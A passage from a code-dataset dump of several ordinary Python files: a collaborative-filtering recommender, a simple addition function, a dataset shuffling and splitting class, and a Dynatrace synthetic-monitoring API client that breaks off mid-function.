simMat(m, itemCF, simMethod)\n mat = copy.deepcopy(m)\n mat[mat==-1] = 0\n \n #初始化推荐数据框,每行代表一个用户,列从左至右依次代表推荐物品\n recMat = pd.DataFrame(np.full([len(uID), rec], \"\"), index = uID,\n columns = range(0, rec))\n \n if itemCF==False:\n for i in range(0, len(uID)):\n #如果用户没有购买任何商品,提示无数据\n if uID[i] in ndU:\n recMat.loc[uID[i], 0] = \"no user data!\"\n else:\n #寻找最相似的top个用户\n simU = [\"\"] * top\n simRow = copy.deepcopy(sMat.loc[uID[i]])\n for j in range(0, top):\n if simRow.max()>simBound: #相似度至少要大于simBound\n simU[j] = simRow.idxmax() #标记用户名称\n simRow[simRow.idxmax()] = simBound\n \n if simU[0]==\"\": #此时无法提供任何推荐\n recMat.loc[uID[i], 0] = \"no similar user\"\n else:\n #基于最相似的用户,预测目标用户所有未购买商品的评分\n new = copy.deepcopy(mat.loc[uID[i]]) #new是新的打分\n new[new!=0] = -2 #已经买过的商品不再打分\n \n #j遍历所有打分格子,k遍历最相似的用户\n simRow = copy.deepcopy(sMat.loc[uID[i]])\n for j in range(0, len(new)):\n if new[j]==0:\n up = 0\n down = 0\n \n #尝试推荐rec个商品\n for k in range(0, top):\n if simU[k]!=\"\":\n up = up + simRow[simU[k]] * \\\n mat.loc[simU[k]][j]\n down = down + simRow[simU[k]]\n new[j] = up / down\n \n #尝试推荐rec个最高评分的商品\n for j in range(0, rec):\n if new.max()>simBound:\n recMat.loc[uID[i], j] = new.idxmax() + \" \" + \\\n str(new.max())\n new[new.idxmax()] = -2\n else:\n recMat.loc[uID[i], j] = \"lower than simBound\"\n break\n \n else:\n for i in range(0, len(uID)): \n if uID[i] in ndU:\n recMat.loc[uID[i], 0] = \"no user data!\"\n else:\n #寻找用户i的正反馈商品表\n matRow = copy.deepcopy(mat.loc[uID[i]])\n pos = matRow[matRow>positive].index\n \n if len(pos)==0: #如果没有正反馈商品,则无法提供任何推荐\n recMat.loc[uID[i], 0] = \"no positive feedback\"\n else:\n #计算用户i所有未购买商品与正反馈商品的相似度\n new = copy.deepcopy(matRow)\n new[new!=0] = -2\n \n #j遍历所有打分格子,k遍历所有正反馈商品\n for j in range(0, len(new)):\n if new[j]==0 and (new.index[j] not in ndI):\n for k in range(0, len(pos)):\n new[j] = new[j] + matRow[pos[k]] * \\\n sMat.at[new.index[j], pos[k]]\n \n #找出相似度最高的rec个商品\n for j in range(0, rec):\n if new.max()>simBound:\n recMat.at[uID[i], j] = new.idxmax() + \" \" + \\\n str(new.max())\n new[new.idxmax()] = simBound\n else:\n recMat.at[uID[i], j] = \"lower than simBound\"\n break\n \n return recMat, sMat\n \n\n \nmat = gM.genMatrix(10, 10, [1, 10])\n\nuID = mat.index[[2, 4, 9]]\n\n[recMat, sMat] = CF(mat, uID, itemCF = True, simMethod = \"pearson_same\", \n positive = 5)\n\n#mat要求:用户和商品名称不重复,无打分项设定为-1,打分区间大于0 \n\n \n \n \n \n \n\n\n","repo_name":"OyCraft/big-data-analysis","sub_path":"extra/CF.py","file_name":"CF.py","file_ext":"py","file_size_in_byte":7782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20382631322","text":"#!/usr/bin/python3\n\"\"\"simple function to add two numbers\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"add a with b\n\n Args:\n a (int): first number\n b (int): second number with default value 98\n\n Raises:\n TypeError: if a or b is not int and not float\n \"\"\"\n\n if not isinstance(a, int) and not isinstance(a, float):\n raise TypeError(\"a must be an integer\")\n if not isinstance(b, int) and not isinstance(b, float):\n raise TypeError(\"b must be an integer\")\n\n return int(a) + int(b)\n","repo_name":"M1-Elmasry/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15942780779","text":"from random import randrange\nfrom re import split\n\nfrom 
src.utils.Singleton import Singleton\n\n\nclass DataSet(metaclass=Singleton):\n data_set = []\n results = []\n\n def __init__(self, split_p=.7):\n self.split = split_p\n\n # Knuth-Fisher-Yates algorithm\n def randomize_set(self):\n for old_index in range(len(self.data_set)):\n new_index = randrange(old_index, len(self.data_set))\n if old_index == new_index:\n continue\n\n self.data_set[old_index], self.data_set[new_index] = self.data_set[new_index], self.data_set[old_index]\n self.results[old_index], self.results[new_index] = self.results[new_index], self.results[old_index]\n\n def get_data_sets(self):\n \"\"\" :return: training_set, verification_set, training_result, verification_result \"\"\"\n\n split_place = int(len(self.data_set) * self.split)\n return self.data_set[:split_place], self.data_set[split_place:], \\\n self.results[:split_place], self.results[split_place:]\n\n def load_data(self, file_name):\n self.data_set = []\n self.results = []\n\n with open(file_name, 'r') as f:\n for line in f.readlines():\n if line[0] != '@':\n line = line.replace('\\n', '')\n values = split(\"[,;]\", line)\n\n self.data_set.append([float(value) for value in values[:-1]])\n self.results.append(values[-1:][0])\n\n # self.data_set = MinMaxScaler(feature_range=(0, 1)).fit_transform(self.data_set)\n","repo_name":"konkath/SupervisedClassifiers","sub_path":"src/utils/DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36380034329","text":"import os\nimport sys\nimport logging\nimport datetime\nimport configparser\nimport ast\nimport time\nimport collections\nimport json\nimport copy\nimport urllib\nimport re\nimport string\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\nfrom email.utils import COMMASPACE\n\nimport requests\nimport pytz\nimport tzlocal\nimport tqdm\nimport xlsxwriter\n\n\nclass cls_config(object):\n def __init__(self, personality=None):\n personality = (\n personality\n if personality\n else {\"credentials\": {\"tenant\": \"\", \"api_token\": \"\", \"proxy\": \"\"}}\n )\n _base = os.path.dirname(os.path.realpath(__file__))\n # setup logging\n log_path = os.path.join(_base, \"logs\")\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n log_file = os.path.join(log_path, \"error.log\")\n logging.basicConfig(\n filename=log_file,\n filemode=\"a\",\n format=\"%(asctime)s %(levelname)-s: %(message)s\",\n level=logging.WARNING,\n datefmt=\"%d-%b-%y %H:%M:%S\",\n )\n # setup output path\n self.output_path = os.path.join(_base, \"output\")\n if not os.path.exists(self.output_path):\n os.mkdir(self.output_path)\n # setup config\n config_path = os.path.join(_base, \"config\")\n if not os.path.exists(config_path):\n os.mkdir(config_path)\n config_file = os.path.join(config_path, \"config\")\n\n self.config = configparser.ConfigParser(allow_no_value=True)\n self.config.optionxform = str\n if not os.path.isfile(config_file):\n self.config.read_dict(personality)\n with open(config_file, \"w\") as cfigfile:\n self.config.write(cfigfile)\n with open(\n os.path.join(config_path, \"common_timezones.txt\"), \"w\"\n ) as common_timezones:\n for timezone in pytz.common_timezones:\n common_timezones.write(\"{}\\n\".format(timezone))\n logging.error(\"No config found - created default config\")\n print(\"No config found - created default config\")\n 
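`DataSet.randomize_set()` above applies the Knuth-Fisher-Yates shuffle to features and labels with the same swap indices, so row i of X still matches label i of y afterwards. The same idea as a standalone function:

from random import randrange

def paired_shuffle(X, y):
    # Fisher-Yates: swap position `old` with a uniform pick from [old, n),
    # applying identical swaps to both sequences to keep them aligned.
    for old in range(len(X)):
        new = randrange(old, len(X))
        X[old], X[new] = X[new], X[old]
        y[old], y[new] = y[new], y[old]

X = [[1.0], [2.0], [3.0], [4.0]]
y = ["a", "b", "c", "d"]
paired_shuffle(X, y)
print(X, y)  # rows and labels stay paired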
sys.tracebacklimit = -1\n sys.exit()\n else:\n self.config.read(config_file)\n\n def config_to_dict(self, section):\n config_dict = {}\n if self.config.has_section(section):\n for option in self.config.options(section):\n value = self.config.get(section, option)\n if len(value) > 0:\n if value.lower() in [\"true\"]:\n value = True\n elif value.lower() in [\"false\"]:\n value = False\n config_dict[option] = value\n return config_dict\n\n\nclass cls_synth(object):\n def __init__(self, config=None):\n self._sleep_seconds = 0.5000\n self.output_path = config.output_path\n credentials = config.config_to_dict(\"credentials\")\n self.tenant = credentials.get(\"tenant\", None)\n self.api_token = credentials.get(\"api_token\", None)\n self.proxy = credentials.get(\"proxy\", None)\n if self.proxy:\n self.proxy = ast.literal_eval(self.proxy)\n\n if self.tenant and self.api_token:\n self.tenant = self.tenant[:-1] if self.tenant.endswith(\"/\") else self.tenant\n else:\n print(\"Credentials tenant/api_token not set in config\")\n logging.error(\"Credentials tenant/api_token not set in config\")\n sys.tracebacklimit = -1\n sys.exit()\n\n report = config.config_to_dict(\"report\")\n self.time_zone = report.get(\"time_zone\", tzlocal.get_localzone().zone)\n\n def _rest_call_(self, method, api_url, params=None, data=None):\n if (self.tenant is None) or (self.api_token is None):\n print(\"Tenant and/or api token not set, check config file\")\n logging.error(\"Tenant and/or api token not set, check config file\")\n sys.tracebacklimit = 0\n sys.exit()\n response = None\n headers = {\n \"Authorization\": \"Api-Token \" + self.api_token,\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n }\n url = self.tenant + api_url\n try:\n response = requests.request(\n method=method,\n url=url,\n headers=headers,\n params=params,\n json=data,\n verify=True,\n proxies=self.proxy,\n )\n response.raise_for_status()\n if response.status_code in [\n requests.codes.no_content,\n requests.codes.created,\n ]:\n return True\n if response.status_code == requests.codes.ok:\n return response.json()\n except requests.exceptions.HTTPError:\n if response.status_code == requests.codes.too_many_requests:\n now = datetime.datetime.now()\n reset_time = datetime.datetime.fromtimestamp(\n int(response.headers[\"X-RateLimit-Reset\"]) / 1000000\n )\n sleep_seconds = (reset_time - now).seconds + 1\n msg = (\n \"too_many_requests, sleeping: \"\n + str(sleep_seconds)\n + \" seconds, reset time: \"\n )\n msg += reset_time.strftime(\"%d-%b-%Y %H:%M\")\n logging.warning(msg)\n time.sleep(sleep_seconds)\n self._rest_call_(method, api_url, params, data)\n else:\n err_msg = \"(\" + str(response.status_code) + \") \" + response.reason\n err_msg = err_msg + \" [requestURL: \" + response.request.url + \"]\"\n err_msg = err_msg + \" Response text: \" + response.text\n logging.error(err_msg)\n\n except (\n requests.exceptions.RequestException,\n requests.exceptions.ConnectionError,\n requests.exceptions.URLRequired,\n requests.exceptions.TooManyRedirects,\n requests.exceptions.Timeout,\n ) as no_response_errs:\n logging.error(no_response_errs)\n return False\n\n @staticmethod\n def monitor_payload():\n return {\n \"frequencyMin\": 0,\n \"anomalyDetection\": {\n \"outageHandling\": {\n \"globalOutage\": False,\n \"localOutage\": False,\n \"localOutagePolicy\": {\"affectedLocations\": 1, \"consecutiveRuns\": 1},\n },\n \"loadingTimeThresholds\": {\"enabled\": False, \"thresholds\": []},\n },\n \"type\": \"BROWSER\",\n \"name\": 
None,\n \"locations\": [],\n \"enabled\": False,\n \"script\": None,\n \"tags\": [],\n \"manuallyAssignedApps\": [],\n \"keyPerformanceMetrics\": {\"loadActionKpm\": None, \"xhrActionKpm\": None},\n }\n\n @staticmethod\n def audit_logs_params():\n return {\n \"nextPageKey\": None,\n \"pageSize\": None,\n \"filter\": None,\n \"from\": None,\n \"to\": None,\n \"sort\": None,\n }\n\n @staticmethod\n def metrics_query_params():\n return {\n \"nextPageKey\": None,\n \"pageSize\": None,\n \"metricSelector\": None,\n \"resolution\": None,\n \"from\": None,\n \"to\": None,\n \"entitySelector\": None,\n }\n\n @staticmethod\n def metrics_params():\n return {\n \"nextPageKey\": None,\n \"pageSize\": None,\n \"metricSelector\": None,\n \"fields\": None,\n }\n\n @staticmethod\n def usql_params():\n return {\n \"query\": None,\n \"startTimestamp\": None,\n \"endTimestamp\": None,\n \"explain\": False,\n }\n\n @staticmethod\n def problems_params():\n return {\n \"relativeTime\": None,\n \"startTimestamp\": None,\n \"endTimestamp\": None,\n \"status\": None,\n \"impactLevel\": None,\n \"severityLevel\": None,\n \"tag\": None,\n \"expandDetails\": True,\n }\n\n @staticmethod\n def monitors_params():\n return {\n \"managementZone\": None,\n \"tag\": None,\n \"location\": None,\n \"assignedApps\": None,\n \"type\": None,\n \"enabled\": None,\n \"credentialId\": None,\n \"credentialOwner\": None,\n }\n\n @staticmethod\n def locations_params():\n return {\"cloudPlatform\": None, \"type\": None}\n\n @staticmethod\n def timeseries_payload():\n return {\n \"timeseriesId\": None,\n \"includeData\": True,\n \"aggregationType\": None,\n \"startTimestamp\": None,\n \"endTimestamp\": None,\n \"predict\": False,\n \"relativeTime\": None,\n \"queryMode\": None,\n \"entities\": [],\n \"tag\": [],\n \"filters\": {},\n \"percentile\": None,\n \"includeParentIds\": False,\n \"considerMaintenanceWindowsForAvailability\": False,\n }\n\n @staticmethod\n def single_url_browser_script(monitor_url, validation_text=None):\n configuration = {\n \"device\": {\"deviceName\": \"Desktop\", \"orientation\": \"landscape\"}\n }\n events = [\n {\n \"type\": \"navigate\",\n \"description\": 'Loading of \"' + monitor_url + '\"',\n \"url\": monitor_url,\n \"wait\": {\"waitFor\": \"page_complete\"},\n }\n ]\n script = {\n \"type\": \"availability\",\n \"version\": \"1.0\",\n \"configuration\": configuration,\n \"events\": events,\n }\n if validation_text:\n script[\"validate\"] = [\n {\n \"type\": \"text_match\",\n \"failIfFound\": False,\n \"isRegex\": False,\n \"match\": validation_text,\n }\n ]\n return script\n\n @staticmethod\n def single_url_http_script(monitor_url, validation_text=None):\n script = {\n \"version\": \"1.0\",\n \"requests\": [\n {\n \"description\": 'Loading of \"' + monitor_url + '\"',\n \"url\": monitor_url,\n \"method\": \"GET\",\n \"requestBody\": \"\",\n \"configuration\": {\n \"acceptAnyCertificate\": True,\n \"followRedirects\": True,\n },\n \"preProcessingScript\": \"\",\n \"postProcessingScript\": \"\",\n }\n ],\n }\n if validation_text:\n script[\"validation\"] = {\n \"rules\": [\n {\n \"value\": validation_text,\n \"failIfFound\": False,\n \"type\": \"patternConstraint\",\n }\n ],\n \"rulesChaining\": \"and\",\n }\n return script\n\n @staticmethod\n def _monitor_to_payload(monitor):\n payload = copy.deepcopy(monitor)\n if \"entityId\" in payload.keys():\n payload[\"tags\"] = [tag[\"key\"] for tag in payload[\"tags\"]]\n payload.pop(\"createdFrom\", None)\n\n payload.pop(\"events\", None)\n 
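On HTTP 429, `_rest_call_()` above sleeps until the `X-RateLimit-Reset` header (microseconds in this API, hence the division by 1,000,000) and then retries itself recursively. The same wait-until-reset pattern written iteratively with a retry cap; the URL is a caller-supplied placeholder:

import datetime
import time

import requests

def get_with_rate_limit(url, max_retries=3):
    for _ in range(max_retries):
        response = requests.get(url)
        if response.status_code != 429:
            return response
        # Header semantics taken from the record above: epoch microseconds.
        reset = datetime.datetime.fromtimestamp(
            int(response.headers["X-RateLimit-Reset"]) / 1_000_000
        )
        wait = max((reset - datetime.datetime.now()).total_seconds(), 0) + 1
        time.sleep(wait)
    return response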
payload.pop(\"requests\", None)\n payload[\"manuallyAssignedApps\"] = []\n return payload\n\n def deep_update(self, target, src):\n for k, v in src.items():\n if isinstance(v, list):\n if not k in target:\n target[k] = copy.deepcopy(v)\n else:\n target[k].extend(v)\n elif isinstance(v, dict):\n if not k in target:\n target[k] = copy.deepcopy(v)\n else:\n self.deep_update(target[k], v)\n elif isinstance(v, set):\n if k not in target:\n target[k] = v.copy()\n else:\n target[k].update(v.copy())\n else:\n target[k] = copy.copy(v)\n\n def date_calc(self, date_option=None):\n # ['Yesterday','WeekToDate','MonthToDate','LastMonth','LastWeek','Last24Hours','Last7Days','Last30Days','QuarterToDate','LastQuarter']\n def t_min(_date):\n return tz.normalize(_date).replace(\n hour=0, minute=0, second=0, microsecond=0\n )\n\n def t_max(_date):\n return tz.normalize(_date).replace(\n hour=23, minute=59, second=59, microsecond=999999\n )\n\n _rptdt = collections.namedtuple(\n \"rptdt\",\n \"start_time,end_time,start_time_epoch,end_time_epoch,name,resolution,time_period,tz\",\n )\n now = datetime.datetime.now(pytz.timezone(self.time_zone))\n tz = now.tzinfo\n first_day_of_current_week = t_min(\n now - datetime.timedelta(days=(now.weekday() + 1) % 7)\n )\n first_day_of_current_month = t_min(\n datetime.datetime(now.year, now.month, 1, tzinfo=tz)\n )\n first_day_of_previous_week = t_min(\n first_day_of_current_week - datetime.timedelta(days=7)\n )\n last_day_previous_week = t_max(\n first_day_of_previous_week + datetime.timedelta(days=6)\n )\n last_day_of_previous_month = t_max(\n first_day_of_current_month - datetime.timedelta(days=1)\n )\n first_day_of_previous_month = t_min(\n datetime.datetime(\n last_day_of_previous_month.year,\n last_day_of_previous_month.month,\n 1,\n tzinfo=tz,\n )\n )\n first_day_current_quarter = t_min(\n datetime.datetime(now.year, (now.month - 1) // 3 * 3 + 1, 1, tzinfo=tz)\n )\n nextQtFirstDy = datetime.datetime(\n now.year + (1 if now.month > 9 else 0),\n 1\n if ((now.month - 1) // 3 * 3 + 4) == 13\n else ((now.month - 1) // 3 * 3 + 4),\n 1,\n tzinfo=tz,\n )\n last_day_current_quarter = t_max((nextQtFirstDy - datetime.timedelta(days=1)))\n last_day_previous_quarter = t_max(\n (first_day_current_quarter - datetime.timedelta(days=1))\n )\n first_day_previous_quarter = t_min(\n datetime.datetime(\n last_day_previous_quarter.year,\n (last_day_previous_quarter.month - 1) // 3 * 3 + 1,\n 1,\n tzinfo=tz,\n )\n )\n\n if date_option == \"WeekToDate\":\n start_time = first_day_of_current_week\n end_time = now\n elif date_option == \"MonthToDate\":\n start_time = first_day_of_current_month\n end_time = now\n elif date_option == \"LastMonth\":\n start_time = first_day_of_previous_month\n end_time = last_day_of_previous_month\n elif date_option == \"LastWeek\":\n start_time = first_day_of_previous_week\n end_time = last_day_previous_week\n elif date_option == \"Last24Hours\":\n start_time = tz.normalize((now - datetime.timedelta(hours=24)))\n end_time = now\n elif date_option == \"Last7Days\":\n start_time = tz.normalize(now - datetime.timedelta(days=7))\n end_time = now\n elif date_option == \"Last30Days\":\n start_time = tz.normalize(now - datetime.timedelta(days=30))\n end_time = now\n elif date_option == \"QuarterToDate\":\n start_time = first_day_current_quarter\n end_time = now\n elif date_option == \"LastQuarter\":\n start_time = first_day_previous_quarter\n end_time = last_day_previous_quarter\n else:\n date_option = \"Yesterday\"\n start_time = t_min(now - 
datetime.timedelta(days=1))\n end_time = start_time.replace(\n hour=23, minute=59, second=59, microsecond=999999\n )\n time_period = (\n date_option\n + \" (\"\n + start_time.strftime(\"%d-%b-%Y %H:%M %Z\")\n + \" - \"\n + end_time.strftime(\"%d-%b-%Y %H:%M %Z\")\n + \")\"\n )\n resolution = \"1d\"\n\n if date_option in [\"Yesterday\", \"Last24Hours\"]:\n resolution = \"1h\"\n\n return _rptdt(\n start_time=start_time.isoformat(timespec=\"minutes\"),\n end_time=end_time.isoformat(timespec=\"minutes\"),\n start_time_epoch=int(start_time.astimezone(pytz.utc).timestamp()) * 1000,\n end_time_epoch=int(end_time.astimezone(pytz.utc).timestamp()) * 1000,\n name=date_option,\n resolution=resolution,\n time_period=time_period,\n tz=tz,\n )\n\n def availability_calc(self, success, failure):\n if (success is None) or (failure is None):\n return 0.00\n if isinstance(success, int) and isinstance(failure, int):\n return float(\"%.2f\" % (success / (success + failure)))\n if isinstance(success, dict) and isinstance(failure, dict):\n availability = {}\n for tstamp in success:\n availability[tstamp] = self.availability_calc(\n success[tstamp], failure[tstamp]\n )\n return {\"Availability\": availability}\n\n def get_monitors(self, params=None):\n return self._rest_call_(\"GET\", \"/api/v1/synthetic/monitors\", params)\n\n def get_monitor(self, entity_id):\n return self._rest_call_(\"GET\", \"/api/v1/synthetic/monitors/\" + entity_id)\n\n def get_monitor_details(self, params=None, monitors=None):\n monitor_details = {}\n if not monitors:\n monitors = self.get_monitors(params)\n if monitors:\n for monitor in tqdm.tqdm(monitors[\"monitors\"], desc=\"Getting Montiors\"):\n _data = self.get_monitor(monitor[\"entityId\"])\n if _data:\n _data[\"tags\"] = [tag[\"key\"] for tag in _data[\"tags\"]]\n monitor_details[_data[\"entityId\"]] = _data\n time.sleep(self._sleep_seconds)\n return monitor_details\n else:\n msg = \"Something went wrong getting \"\n msg += \"monitor details\"\n msg += \". Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def post_monitor(self, monitor):\n monitor.pop(\"entityId\", None)\n data = self._monitor_to_payload(monitor)\n return self._rest_call_(\"POST\", \"/api/v1/synthetic/monitors\", None, data)\n\n def put_monitor(self, monitor):\n data = self._monitor_to_payload(monitor)\n return self._rest_call_(\n \"PUT\", \"/api/v1/synthetic/monitors/\" + monitor[\"entityId\"], None, data\n )\n\n def delete_monitor(self, entity_id):\n return self._rest_call_(\"DELETE\", \"/api/v1/synthetic/monitors/\" + entity_id)\n\n def get_locations(self, params=None):\n return self._rest_call_(\"GET\", \"/api/v1/synthetic/locations\", params)\n\n def get_location(self, entityId):\n return self._rest_call_(\"GET\", \"/api/v1/synthetic/locations/\" + entityId)\n\n def get_location_details(self, params=None):\n location_details = {}\n locations = self.get_locations(params)\n if \"locations\" in locations:\n locations = locations[\"locations\"]\n for location in tqdm.tqdm(locations, desc=\"Getting locations\"):\n location_id = location.get(\"entityId\")\n location_details[location_id] = self.get_location(location_id)\n time.sleep(self._sleep_seconds)\n return location_details\n else:\n msg = \"Something went wrong getting \"\n msg += \"location details\"\n msg += \". 
Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def get_problems(self, params=None):\n return self._rest_call_(\"GET\", \"/api/v1/problem/feed\", params)\n\n def _get_metrics_query(self, params):\n return self._rest_call_(\"GET\", \"/api/v2/metrics/query\", params)\n\n def get_metrics_query(self, params, trans_by=True):\n metrics_query = {}\n _data = {}\n query = self._get_metrics_query(params)\n if query:\n for metric in query[\"result\"]:\n metric_id = metric.pop(\"metricId\")\n metrics_query[metric_id] = metric\n while query.get(\"nextPageKey\", False):\n time.sleep(self._sleep_seconds)\n params = self.metrics_query_params()\n params[\"nextPageKey\"] = query.get(\"nextPageKey\")\n query = self._get_metrics_query(params)\n if query:\n for metric in query[\"result\"]:\n metric_id = metric.pop(\"metricId\")\n _data[metric_id] = metric\n self.deep_update(metrics_query, _data)\n else:\n break\n if trans_by:\n metrics_query = self.trans_query(metrics_query)\n return metrics_query\n\n def get_all_metrics(self):\n params = self.metrics_params()\n all_metrics = {}\n metrics = self.get_metrics(params)\n if metrics:\n for metric in metrics[\"metrics\"]:\n all_metrics[metric.pop(\"metricId\")] = metric\n while metrics.get(\"nextPageKey\", False):\n time.sleep(self._sleep_seconds)\n params = self.metrics_params()\n params[\"nextPageKey\"] = metrics[\"nextPageKey\"]\n metrics = self.get_metrics(params)\n if metrics:\n for metric in metrics[\"metrics\"]:\n all_metrics[metric.pop(\"metricId\")] = metric\n else:\n break\n return all_metrics\n\n def get_metrics(self, params):\n return self._rest_call_(\"GET\", \"/api/v2/metrics/\", params)\n\n def get_metric(self, metricId):\n return self._rest_call_(\"GET\", \"/api/v2/metrics/\" + metricId)\n\n def _get_audit_logs(self, params):\n return self._rest_call_(\"GET\", \"/api/v2/auditlogs\", params)\n\n def get_audit_logs(self, params=None):\n _data = self._get_audit_logs(params)\n if _data:\n data = _data[\"auditLogs\"]\n while _data.get(\"nextPageKey\", False):\n time.sleep(self._sleep_seconds)\n params = synth.audit_logs_params()\n params[\"nextPageKey\"] = _data[\"nextPageKey\"]\n _data = self._get_audit_logs(params)\n if _data:\n data = data + _data[\"auditLogs\"]\n else:\n break\n return data\n\n def post_timeseries(self, data):\n timeseries_id = urllib.parse.quote(data[\"timeseriesId\"])\n return self._rest_call_(\n \"POST\", \"/api/v1/timeseries/\" + timeseries_id, None, data\n )\n\n def get_timeseries(self, params):\n timeseries_id = urllib.parse.quote(params.pop(\"timeseriesId\"))\n return self._rest_call_(\"GET\", \"/api/v1/timeseries/\" + timeseries_id, params)\n\n def get_metrics_dimensions(self, metricSelector):\n def tree():\n return collections.defaultdict(tree)\n\n dimensions = tree()\n data = self.get_metric(metricSelector)\n if data:\n metric_id = data[\"metricId\"]\n dimensions[metric_id][\"displayName\"] = data[\"displayName\"]\n for dimension in data[\"dimensionDefinitions\"]:\n dimensions[metric_id][\"dimensions\"][dimension[\"name\"]] = dimension[\n \"index\"\n ]\n return json.loads(json.dumps(dimensions))\n else:\n msg = \"Something went wrong getting \"\n msg += \"metrics dimensions\"\n msg += \". 
Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def get_notifications(self):\n return self._rest_call_(\"GET\", \"/api/config/v1/notifications\")\n\n def get_notification(self, notification_id):\n return self._rest_call_(\n \"GET\", \"/api/config/v1/notifications/\" + notification_id\n )\n\n def get_notification_details(self):\n notification_details = {}\n notifications = self.get_notifications()\n if notifications:\n for notification in tqdm.tqdm(\n notifications[\"values\"], desc=\"Getting notifications\"\n ):\n data = self.get_notification(notification[\"id\"])\n notification_details[notification[\"id\"]] = data\n time.sleep(self._sleep_seconds)\n return notification_details\n else:\n return None\n\n def get_alerting_profiles(self):\n return self._rest_call_(\"GET\", \"/api/config/v1/alertingProfiles\")\n\n def get_alerting_profile(self, profile_id):\n return self._rest_call_(\"GET\", \"/api/config/v1/alertingProfiles/\" + profile_id)\n\n def get_alerting_profile_details(self):\n alerting_profile_details = {}\n alerting_profiles = self.get_alerting_profiles()\n if alerting_profiles:\n for alerting_profile in tqdm.tqdm(\n alerting_profiles[\"values\"], desc=\"Alerting Profiles\"\n ):\n _data = self.get_alerting_profile(alerting_profile[\"id\"])\n alerting_profile_details[alerting_profile[\"id\"]] = _data\n time.sleep(self._sleep_seconds)\n return alerting_profile_details\n else:\n msg = \"Something went wrong getting \"\n msg += \"alerting profile details\"\n msg += \". Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def get_maintenance_windows(self):\n return self._rest_call_(\"GET\", \"/api/config/v1/maintenanceWindows\")\n\n def get_maintenance_window(self, mw_id):\n return self._rest_call_(\"GET\", \"/api/config/v1/maintenanceWindows/\" + mw_id)\n\n def get_maintenance_window_details(self):\n maintenance_window_details = {}\n maintenance_windows = self.get_maintenance_windows()\n if maintenance_windows:\n for maintenanceWindow in tqdm.tqdm(\n maintenance_windows[\"values\"], desc=\"Getting maintenance windows\"\n ):\n data = self.get_maintenance_window(maintenanceWindow[\"id\"])\n maintenance_window_details[maintenanceWindow[\"id\"]] = data\n time.sleep(self._sleep_seconds)\n return maintenance_window_details\n else:\n msg = \"Something went wrong getting \"\n msg += \"maintenance window details\"\n msg += \". 
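`get_metrics_query()`, `get_all_metrics()`, and `get_audit_logs()` above all share one pagination shape: request a page, merge its items, and follow `nextPageKey` until it is absent. A generic sketch of that loop, where `fetch_page` is a hypothetical stand-in for the `_get_*` helpers:

import time

def fetch_all(fetch_page, item_key, sleep_seconds=0.5):
    # fetch_page(params) -> dict with item_key and optional "nextPageKey",
    # or a falsy value on error (mirroring _rest_call_ above).
    items = []
    params = {}
    while True:
        page = fetch_page(params)
        if not page:
            break
        items.extend(page.get(item_key, []))
        next_key = page.get("nextPageKey")
        if not next_key:
            break
        params = {"nextPageKey": next_key}
        time.sleep(sleep_seconds)  # throttle, as the class above does
    return items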
Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def post_maintenance_window(self, data):\n if \"id\" in data:\n data.pop(\"id\", None)\n return self._rest_call_(\"POST\", \"/api/config/v1/maintenanceWindows\", None, data)\n\n def put_maintenance_window(self, mw_id, data):\n return self._rest_call_(\n \"PUT\", \"/api/config/v1/maintenanceWindows/\" + mw_id, None, data\n )\n\n def delete_maintenance_window(self, mw_id):\n return self._rest_call_(\"DELETE\", \"/api/config/v1/maintenanceWindows/\" + mw_id)\n\n def get_usql_query(self, params):\n return self._rest_call_(\"GET\", \"/api/v1/userSessionQueryLanguage/table\", params)\n\n def dump_file(self, data, file_name=None):\n date_string = datetime.datetime.now().strftime(\"%m%d%Y%H%M%S%f\")\n file_name = (\n (file_name + \".json\") if file_name else (\"data\" + date_string + \".json\")\n )\n data_file = os.path.join(self.output_path, file_name)\n with open(data_file, \"w\") as dat_file:\n dat_file.write(json.dumps(data, indent=3))\n return data_file\n\n def trans_query(self, metric_data):\n trans = {}\n aggs = [\"avg\", \"count\", \"max\", \"min\", \"percentile\", \"sum\"]\n if metric_data:\n for metric, data in metric_data.items():\n meta_metric = self.get_metric(metric)\n dims_metric = {}\n for dim in meta_metric[\"dimensionDefinitions\"]:\n dims_metric[dim[\"index\"]] = dim[\"name\"]\n meta_trans = (\n self.get_metric(metric.replace(\":names\", \"\"))\n if \":names\" in metric\n else meta_metric\n )\n dims_trans = {}\n for dim in meta_trans[\"dimensionDefinitions\"]:\n dims_trans[dim[\"index\"]] = dim[\"name\"]\n metric_name = meta_metric[\"displayName\"]\n if any(agg in metric for agg in aggs):\n for agg in aggs:\n if agg in metric:\n if \"percentile\" in agg:\n _idx = metric.find(\"percentile\")\n percentile = metric[_idx : metric.find(\")\", _idx) + 1]\n metric_name = percentile + \" \" + metric_name\n else:\n metric_name = agg + \" \" + metric_name\n\n for data_point in data[\"data\"]:\n dimensions = data_point[\"dimensions\"]\n dims_data = {}\n _idx = 0\n for dim in dimensions:\n dims_data[dims_metric[_idx]] = dim\n _idx += 1\n timestamps = data_point[\"timestamps\"]\n values = data_point[\"values\"]\n if len(timestamps) > 1:\n values = dict(zip(timestamps, values))\n else:\n values = values.pop()\n dstr = \"\"\n for idx, dim in dims_trans.items():\n if dim + \"_name\" in dims_data:\n dstr = (\n dstr\n + '{\"'\n + dims_data[dim]\n + \"|\"\n + dims_data[dim + \"_name\"].translate(\n str.maketrans(\"\", \"\", '\\t\\n\\r\\x0b\\x0c\"')\n )\n + '\":'\n )\n else:\n dstr = dstr + 